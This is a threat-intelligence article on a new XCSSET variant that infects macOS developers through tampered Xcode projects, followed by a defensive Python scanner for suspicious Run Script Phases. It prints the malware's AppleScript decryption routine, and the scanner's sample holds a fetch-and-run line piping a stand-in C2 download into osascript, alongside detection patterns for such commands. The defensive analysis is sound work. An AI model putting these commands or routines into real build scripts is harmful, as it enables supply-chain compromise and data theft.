The macOS threat landscape has witnessed a significant escalation with the discovery of a new variant of the XCSSET malware targeting app developers.
First observed in late September 2025, this variant builds upon earlier versions by introducing enhanced stealth techniques, expanded exfiltration capabilities, and robust persistence mechanisms.
Attackers continue to leverage infected Xcode projects—the cornerstone of macOS and iOS development—as the primary infection vector.
Developers who clone or download tainted project repositories inadvertently trigger a multi-stage infection chain that unfolds each time an Xcode build is initiated.
Microsoft analysts noted that this variant was identified during routine telemetry analysis of Xcode build processes, revealing that malicious scripts are injected into project files and executed via AppleScript and shell commands.
The campaign remains relatively targeted, affecting only a small number of high-value development environments thus far.
Nonetheless, the sophistication of its modules—including clipboard hijacking, browser data theft, and LaunchDaemon-based persistence—underscores a growing trend of supply-chain exploitation in software development.
Upon build execution, the malware follows a four-stage chain consistent with earlier variants, but now adds a fourth stage that dynamically downloads and runs new submodules from a command-and-control (C2) server.
These submodules are fetched and executed using a modified boot function that includes additional checks for Firefox installations and Telegram binaries, enabling broader browser targeting and messaging-app reconnaissance.
Its expanded info-stealer module even exfiltrates data from Firefox profiles, complementing prior Chrome and Safari theft capabilities.
[Figure: the boot function of the latest version (Source - Microsoft)]
In this iteration, encrypted payloads and compiled run-only AppleScripts are employed to obfuscate functionality and evade static analysis.
The decryption routine (dec) is implemented in AppleScript and uses a hardcoded AES key and an initialization vector extracted from the first 32 bytes of the encrypted blob.
After Base64 decoding, the script invokes the AES decryption primitive to retrieve a configuration file for further payload execution.
[Figure: the dec function (Source - Microsoft)]
on dec(in)
	-- the first 32 characters of the blob are the hex-encoded IV
	set iv to text 1 thru 32 of in
	-- the remainder is Base64 ciphertext; decode it with the system base64 tool
	set encryptedData to (do shell script "echo \"" & (text 33 thru -1 of in) & "\" | base64 --decode")
	-- hardcoded hex key (32 hex characters = 16 bytes; openssl zero-pads it to the 32 bytes aes-256-cbc expects)
	set key to "27860c1670a8d2f3de7bbc74cd754121"
	-- decrypt with openssl, feeding the ciphertext via a here-string
	set decryptedBlob to do shell script "openssl aes-256-cbc -d -K " & key & " -iv " & iv & " <<< " & quoted form of encryptedData
	return decryptedBlob
end dec
Infection Mechanism
The infection chain begins when a developer opens or builds a compromised Xcode project. A malicious Run Script Phase injects a shell command that downloads the fourth-stage AppleScript binary from C2.
This script first validates the environment by enumerating installed browsers and messaging apps, then fetches additional modules tailored for data theft and persistence.
Clipboard monitors intercept cryptocurrency addresses copied by users, substituting them with attacker-controlled addresses if predefined regex patterns match.
Meanwhile, the LaunchDaemon submodule writes a fake com.google.System Settings.app bundle into the tmp directory, loading a persistent .root payload at system launch.
By masquerading as a legitimate system component, XCSSET maintains execution across reboots and evades casual inspection.
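Because the infection starts in a Run Script Phase of the Xcode project, one practical check is to scan project.pbxproj for build-phase scripts that download content or hand it to osascript. The following is an added example written for this article, not Microsoft's tooling or any XCSSET code; the pbxproj excerpt and the host name are constructed, and the indicator list is an assumption based on the behaviour described above.

```python
import re
from typing import Dict, List

# Assumed indicators, derived from the chain described above: fetch a payload,
# decode it (base64/openssl), then run it through osascript or a shell.
SUSPICIOUS_PATTERNS: Dict[str, str] = {
    "osascript": r"\bosascript\b",
    "base64_decode": r"\bbase64\s+(--decode|-d|-D)\b",
    "download_to_interpreter": r"\b(curl|wget)\b[^\n]*\|\s*(sh|bash|zsh|osascript|python3?)\b",
    "openssl_decrypt": r"\bopenssl\s+\S+\s+-d\b",
    "eval": r"\beval\b",
}

# One PBXShellScriptBuildPhase object runs from its "isa" line to the closing "};"
BLOCK_RE = re.compile(r"isa\s*=\s*PBXShellScriptBuildPhase;(?P<body>.*?)\n\s*\};", re.DOTALL)
# shellScript is a C-style quoted string: \" and \n are escaped inside it
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"(?P<script>(?:[^"\\]|\\.)*)";')

def _unescape(s: str) -> str:
    """Undo pbxproj string escaping (\\n, \\t, \\", \\\\)."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)

def find_suspicious_run_scripts(pbxproj: str) -> List[Dict[str, object]]:
    """Return one finding per Run Script Phase that trips any indicator."""
    findings: List[Dict[str, object]] = []
    for block in BLOCK_RE.finditer(pbxproj):
        m = SCRIPT_RE.search(block.group("body"))
        if not m:
            continue
        script = _unescape(m.group("script"))
        hits = [name for name, pat in SUSPICIOUS_PATTERNS.items() if re.search(pat, script)]
        if hits:
            findings.append({"script": script, "indicators": hits})
    return findings

# Constructed pbxproj fragment: a benign lint step and a tampered phase.
SAMPLE_PBXPROJ = r'''
		AA0000000000000000000001 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "echo \"Lint step\"\nswiftlint\n";
		};
		AA0000000000000000000002 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -fsSL http://c2.example.invalid/stage4 | base64 --decode | osascript\n";
		};
'''

if __name__ == "__main__":
    for f in find_suspicious_run_scripts(SAMPLE_PBXPROJ):
        print(f["indicators"], "<-", f["script"].strip())
```

Run it against every project.pbxproj under a cloned repository before the first build; a hit is a reason to read the script by hand, not proof of compromise.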
This new XCSSET variant represents a leap forward in macOS supply-chain attacks against developers.
Its fusion of encrypted AppleScripts, dynamic module loading, and OS-level persistence poses a substantial threat to software integrity.
Developers are urged to verify the authenticity of Xcode project sources, monitor unexpected network requests during builds, and deploy endpoint protection solutions capable of detecting anomalous osascript executions and hidden LaunchDaemon entries.
Continuous vigilance and timely software updates remain the most effective defenses against evolving threats such as XCSSET.